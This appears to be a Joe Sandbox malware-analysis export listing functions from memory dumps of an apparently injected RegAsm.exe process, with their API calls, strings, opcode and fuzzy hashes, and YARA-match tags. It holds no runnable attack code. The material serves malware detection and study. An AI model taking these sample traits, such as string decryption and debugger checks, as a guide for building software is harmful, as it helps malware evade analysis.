Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID: YHI;
API String ID: 3475089800-2037931556
Opcode ID: 5c98da2e47f7918bb6187bf6459694af345bba240002427335a853943f2f496e
Instruction ID: 51fa16fa20be6b2fa6a559cd9d543e9a27af91acb9e3cff43af731169eaa8f3c
Opcode Fuzzy Hash: 5c98da2e47f7918bb6187bf6459694af345bba240002427335a853943f2f496e
Instruction Fuzzy Hash: 655150B5A00215AFDF04DFA9DC80AAE77BCEF44B40F594479E915EF280EB70A549CB60

Uniqueness

Uniqueness Score: -1.00%

Function 198C51D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 141COMMON

Download Yara Rule

Strings

, xrefs: 198C5334
REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 198C5264

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: $REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-69911113
Opcode ID: c2473dc5b89e2494697acc2fc6f2902e27f0c1d089006db3e70337df73452b4e
Instruction ID: 8c6c02a5f1f4de1e5179451594e933db381af18b2a87ee6d87e8ee67be4c37fc
Opcode Fuzzy Hash: c2473dc5b89e2494697acc2fc6f2902e27f0c1d089006db3e70337df73452b4e
Instruction Fuzzy Hash: E5418175A04301AFDB00DF29DC80B5AB7E9FF98304F49452DF948AB251D772E951CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 198FD610 Relevance: 10.6, APIs: 7, Instructions: 128COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction ID: 881fd14810846ee314b9ece0cb919883e00d19044ec9d0e45abc6d8f1e32f1b5
Opcode Fuzzy Hash: 8fd5a444f62547b55e1c478906cffc6cc5e8d8fd97acf4dcf33dab7dbce9423b
Instruction Fuzzy Hash: 9941F675500B02AFCB019F29CC80A1BB7F8FF45310F08962CFA6886250E775F955CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 19834820 Relevance: 9.3, APIs: 6, Instructions: 285COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7333b6ae7f438e9f13264d5ec02f2a13494b89a42daa96bea5ba5dfb117743ce
Instruction ID: a1a0f9a0f257d57b58759658e95c4b310872dcbe203b0dc5a81bf583d425540f
Opcode Fuzzy Hash: 7333b6ae7f438e9f13264d5ec02f2a13494b89a42daa96bea5ba5dfb117743ce
Instruction Fuzzy Hash: 61B19EB4804746AFD700CF39C880B1BB7E8BF95705F489A1DF85996280E779E594CB92

Uniqueness

Uniqueness Score: -1.00%

Function 19835C70 Relevance: 9.1, APIs: 6, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction ID: 7175e33c718afa148963fd5a951450ebcc4e67d57430ebe88650da96108c3bf5
Opcode Fuzzy Hash: 43830c2c14d87b3ae716c7a1980d3d4f048575f12cac28b556fe9d979f0dcba0
Instruction Fuzzy Hash: 9A4123B52043019FDB14DF28C884E66B7F4FF98312F58446DE8898B691E772FA55CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 198B9090 Relevance: 9.1, APIs: 6, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c47665ceff2693bb0f0888cf98311f0e1bcc986260295014b90568168a65808
Instruction ID: c7889d46b62831b29a5478e543dd813bb527290ae742b75637769b5058f1f589
Opcode Fuzzy Hash: 7c47665ceff2693bb0f0888cf98311f0e1bcc986260295014b90568168a65808
Instruction Fuzzy Hash: A431BE396002009FD314CF28D885A66B3E4FF80329B5D45ADE9428F3A2D722FC95DB90

Uniqueness

Uniqueness Score: -1.00%

Function 0040825F Relevance: 9.1, APIs: 6, Instructions: 83stringencryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00408286
lstrlen.KERNEL32(0040858B,00000001,?,00000014,00000000,00000000,?,0040858B,00000014), ref: 004082A0
CryptStringToBinaryA.CRYPT32(0040858B,00000000,?,0040858B,00000014), ref: 004082AA
memcpy.MSVCRT ref: 00408312
lstrcat.KERNEL32(00423BB7,00423BBB), ref: 00408339
lstrcat.KERNEL32(00423BB7,00423BBE), ref: 00408351

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: lstrcat$BinaryCryptStringlstrlenmemcpymemset
String ID:
API String ID: 1498829745-0
Opcode ID: 86e97159dc29741583b43b5bf0577f380440bf8f7e26ec31949e0f6a887f12a0
Instruction ID: 25ca3563e8dc449186963e0bf0a6fab518f3cb9fde527b24148f19c1c0cbe8d8
Opcode Fuzzy Hash: 86e97159dc29741583b43b5bf0577f380440bf8f7e26ec31949e0f6a887f12a0
Instruction Fuzzy Hash: 1521AC71A00219EFCB009F94ED44AEE7BBDBF04784F0004BAF901F2240EB399B559BA5

Uniqueness

Uniqueness Score: -1.00%

Function 198A1FE0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?), xrefs: 198A2001

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: REPLACE INTO '%q'.'%q_data'(id, block) VALUES(?,?)
API String ID: 0-914542581
Opcode ID: 0cf91604e7cb0e8619bf82a2f514fdebe31c49219dfffc6eaca376ba51d3e4ad
Instruction ID: 81b037d8cdb595edf8d14b33dfcb6195296353f7ae00c78a22adc5e55b2c23c4
Opcode Fuzzy Hash: 0cf91604e7cb0e8619bf82a2f514fdebe31c49219dfffc6eaca376ba51d3e4ad
Instruction Fuzzy Hash: 1F21DDB9500215AFDB20AF69DC80F5677EEFF24714F48841CF94497161E362F860CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 19A13300 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,00000000,?,?,?,19A13688,?,00000000), ref: 19A13399
GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,00000000,?,?,?,19A13688,?,00000000), ref: 19A133C2
GetACP.KERNEL32(?,?,19A13688,?,00000000), ref: 19A133D7

Strings

ACP, xrefs: 19A1331E
OCP, xrefs: 19A13354

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: 3fde05c3e6c62814b067315dab74e87ec228e5014e245ab8324b8f12b39e3bda
Instruction ID: 0b7c886d93d6a1aad63378e2ded56061333120dca21659776dcab1caedb6416e
Opcode Fuzzy Hash: 3fde05c3e6c62814b067315dab74e87ec228e5014e245ab8324b8f12b39e3bda
Instruction Fuzzy Hash: 1F219532700243AAE7158F65C906A8B73AEAF50F90B8F8474E949DF184EF32D94DC358

Uniqueness

Uniqueness Score: -1.00%

Function 00419387 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041C13A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041C14F
UnhandledExceptionFilter.KERNEL32(00426DF0), ref: 0041C15A
GetCurrentProcess.KERNEL32(C0000409), ref: 0041C176
TerminateProcess.KERNEL32(00000000), ref: 0041C17D

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 926d9496fb6b5781bfe50d80a180537aa0dd22fad9db7dff5851091f163dd7a5
Instruction ID: 5c43d2e48c6e04b75f2a9b1155548d19a2e244ba8729a6803041e9bd8e9cbae7
Opcode Fuzzy Hash: 926d9496fb6b5781bfe50d80a180537aa0dd22fad9db7dff5851091f163dd7a5
Instruction Fuzzy Hash: 6B21DDF9A00304DFD720DF65FD99754BBB2BB48314F52202AE80A87661E7B45981CF89

Uniqueness

Uniqueness Score: -1.00%

Function 00402420 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00402445
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,00000014,00000000,00000000), ref: 0040246B
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,00000000,00000000,00000000), ref: 00402485

Strings

UNK, xrefs: 00402494

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptString$memset
String ID: UNK
API String ID: 1505698593-448974810
Opcode ID: 62b9d19b6a11a79744d04796c1f85149cd126a538d96f4649f8111959ccd7188
Instruction ID: 9f21ffb8b814cbdb48cbc3b41153ece4c9f4a257cb6628d7501e8ee4f46469c8
Opcode Fuzzy Hash: 62b9d19b6a11a79744d04796c1f85149cd126a538d96f4649f8111959ccd7188
Instruction Fuzzy Hash: E00167F260015CBEE711EA95DE81DFF77ACDB44654F00007BB604A2181E6F4EE458A78

Uniqueness

Uniqueness Score: -1.00%

Function 19822C8E Relevance: 6.1, APIs: 4, Instructions: 74COMMON

Download Yara Rule

APIs

IsProcessorFeaturePresent.KERNEL32(00000017), ref: 199C48A7
IsDebuggerPresent.KERNEL32 ref: 199C4973
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 199C4993
UnhandledExceptionFilter.KERNEL32(?), ref: 199C499D

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
String ID:
API String ID: 254469556-0
Opcode ID: c9d4716c4ae106ab71c2cde1bb114a0fc21f2dff85fab51045de3955d890b61b
Instruction ID: 9f320eb4222849be22b10c72f2b73257cb60299f867ebd1cd42a93da02f39d0a
Opcode Fuzzy Hash: c9d4716c4ae106ab71c2cde1bb114a0fc21f2dff85fab51045de3955d890b61b
Instruction Fuzzy Hash: 80311875D0126C9BDB11DFA5C989BCCBBB8AF08704F1041AAE44DAB280EB759A85CF05

Uniqueness

Uniqueness Score: -1.00%

Function 0040F82E Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 0040F852
GetProcessHeap.KERNEL32(00000000,?,?,004043C8,?,?,?,?,?,?), ref: 0040F85F
HeapAlloc.KERNEL32(00000000,?,004043C8,?,?,?,?,?,?), ref: 0040F866

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 77c4e192cfc07588887914397eec6378b67b364821b17ba415bff07f9bdaf23d
Instruction ID: ac9393c850f434343fc82b96a5b52d3fd0e9389ef2404fd1dbb9cfc5d77e508d
Opcode Fuzzy Hash: 77c4e192cfc07588887914397eec6378b67b364821b17ba415bff07f9bdaf23d
Instruction Fuzzy Hash: 55015732500209BFDF219F61DC488AB7BAEEF49360B108439F801A3260D7359C51EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004061EF Relevance: 6.0, APIs: 4, Instructions: 48encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 0040620F
LocalAlloc.KERNEL32(00000040,004058D6,?,?,004058D6,00000000,?,?), ref: 0040621D
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058D6,00000000,00000000), ref: 00406233
LocalFree.KERNEL32(00000000,?,?,004058D6,00000000,?,?), ref: 00406242

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID:
API String ID: 4291131564-0
Opcode ID: c6a24e54a40c657710bafd801b3af3228f2ec70fa5c85ff84f724536ac891562
Instruction ID: 9d0b56530ffa0ea51232b36620d4ac7d0a45882450ef97ec5236ac9745e425cd
Opcode Fuzzy Hash: c6a24e54a40c657710bafd801b3af3228f2ec70fa5c85ff84f724536ac891562
Instruction Fuzzy Hash: 3A01E870101224BFCB215F66DC88E8B7FB9FF4ABA1B104056F90AA6254D3719910DBE4

Uniqueness

Uniqueness Score: -1.00%

Function 199037E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction ID: e30365a949857b8accd5d30b167b09544720c94a6d3af0377d1f552827ecdd50
Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction Fuzzy Hash: E2E0923A004780BBCB225B55DC85E4ABBA6BF48314F589C1CF68561470C6A2A8E6EB41

Uniqueness

Uniqueness Score: -1.00%

Function 198E3770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
